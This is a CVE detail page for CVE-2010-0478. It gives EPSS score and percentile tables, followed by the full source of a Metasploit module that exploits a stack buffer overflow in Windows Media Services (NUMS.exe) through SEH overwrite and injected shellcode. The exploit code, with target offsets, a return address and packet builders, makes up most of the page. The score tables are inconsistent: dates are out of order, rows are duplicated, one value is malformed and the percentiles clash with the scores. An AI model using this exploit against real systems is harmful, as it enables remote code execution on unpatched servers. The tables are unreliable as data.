CVE-2010-0478 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	86.47%	–	–
2023-03-12	–	–	–	97.25%	–
2023-03-19	–	–	–	97.27%	–
2023-05-07	–	–	–	97.21%	–
2023-06-18	–	–	–	97.24%	–
2023-07-30	–	–	–	97.23%	–
2023-09-10	–	–	–	97.06%	–
2023-10-29	–	–	–	96.8%	–
2023-12-10	–	–	–	96.89%	–
2024-01-21	–	–	–	96.94%	–
2024-06-02	–	–	–	96.91%	–
2024-09-01	–	–	–	96.96%	–
2024-11-24	–	–	–	96.92%	–
2024-12-22	–	–	–	96.88%	–
2025-02-16	–	–	–	96.71%	–
2025-01-19	–	–	–	96.88%	–
2025-02-16	–	–	–	96.71%	–
2025-03-18	–	–	–	–	78.68%
2025-03-18	–	–	–	–	78.68,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-03-19	1%
2023-05-07	1%
2023-06-18	1%
2023-07-30	1%
2023-09-10	1%
2023-10-29	1%
2023-12-10	1%
2024-01-21	1%
2024-06-02	1%
2024-09-01	1%
2024-11-24	1%
2024-12-22	1%
2025-02-16	1%
2025-01-19	1%
2025-02-16	1%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms10_025_wmss_connect_funnel.rb 9166 2010-04-28 00:48:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the "NetShowServices" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. Successful, as well as unsuccessful exploitation attempts will kill the service which prevents additional attempts. }, 'Author' => 'jduck', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9166 $', 'References' => [ [ 'CVE', '2010-0478' ], [ 'OSVDB', '63726' ], [ 'MSB', 'MS10-025' ], [ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { # Unpatched: # SEH handler offset is 840 # Stack return is at 652 # "Patched": # SEH handler offset is 832 'Offset' => 840, 'SEHOffsets' => [ 832, 840 ], 'EIPOffset' => 652+3, 'Ret' => 0x75022ac4 # p/p/r in ws2help.dll } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 13 2010', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1755) ], self.class) end def exploit @pkts = 0 cmd_buf = '' # LinkViewerToMacConnect subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}" #subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net" #subscriber = "Spooooon!" subscriber << "\x00" subscriber = Rex::Text.to_unicode(subscriber) cmd_buf << make_command(0x30001, subscriber) # LinkViewerToMacConnectFunnel name = '' name << "\\\\" name << rand_text((target['Offset'] + 4 + 5) / 2) name << "\\" name << "\x00" # Convert it to Unicode.. name = Rex::Text.to_unicode(name) stuff = Rex::Text.pattern_create((target['Offset'] + 4 + 5) + 4) stuff.slice!(0,4) name[4,stuff.length] = stuff # Insert the payload.. name[4,payload.encoded.length] = payload.encoded # Build the SEH frame that leads to the payload... target['SEHOffsets'].each { |off| seh = '' case off when 832 code = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-652").encode_string code << rand_text(8 - code.length) name[off-8,code.length] = code seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-8").encode_string seh << rand_text(2) seh << [target.ret].pack('V') when 840 seh << generate_seh_record(target.ret) asm = "add edi, 0x04\njmp edi" seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string end name[off,seh.length] = seh } # Make sure the return address points at an invalid address off = target['EIPOffset'] name[off,1] = [0x80 + rand(0x7f)].pack('C') # Add it to the command buffer.. cmd_buf << make_command(0x30002, name) # Build the TcpMessageHeader .. pkt = make_tcpmsghdr(cmd_buf) # Handle the transacation.. connect print_status("Sending crafy commands (#{pkt.length} bytes) ...") sock.put(pkt) handler disconnect end # # Create a TcpMessageHeader from the supplied data # def make_tcpmsghdr(data) len = data.length # The server doesn't like packets that are bigger... raise RuntimeError, 'Length too big' if (len > 0x1000) len /= 8 # Pack the pieces in ... pkt = [ 1,0,0,0, # rep, ver, verMinor, pad 0xb00bface, # session id (nice) data.length + 16, # msg len 0x20534d4d, # seal ("MMS ") len + 2, # chunkCount @pkts, 0, # seq, MBZ rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e ].pack('CCCCVVVVvvVV') # Add the data pkt << data # Pad it to 8 bytes... left = data.length % 8 pkt << ("\x00" * (8 - left)) if (left > 0) pkt end # # Create a command packet # def make_command(msg_id, extra) # Two opcodes, get handled differently.. case msg_id when 0x30001 data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV') when 0x30002 data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV') end # Put some data on... data << extra # Pad it to 8 bytes... left = data.length % 8 data << ("\x00" * (8 - left)) if (left > 0) # Combine the pieces.. pkt = [ (data.length / 8) + 1, # chunkLen msg_id # msg ID ].pack('VV') pkt << data pkt end end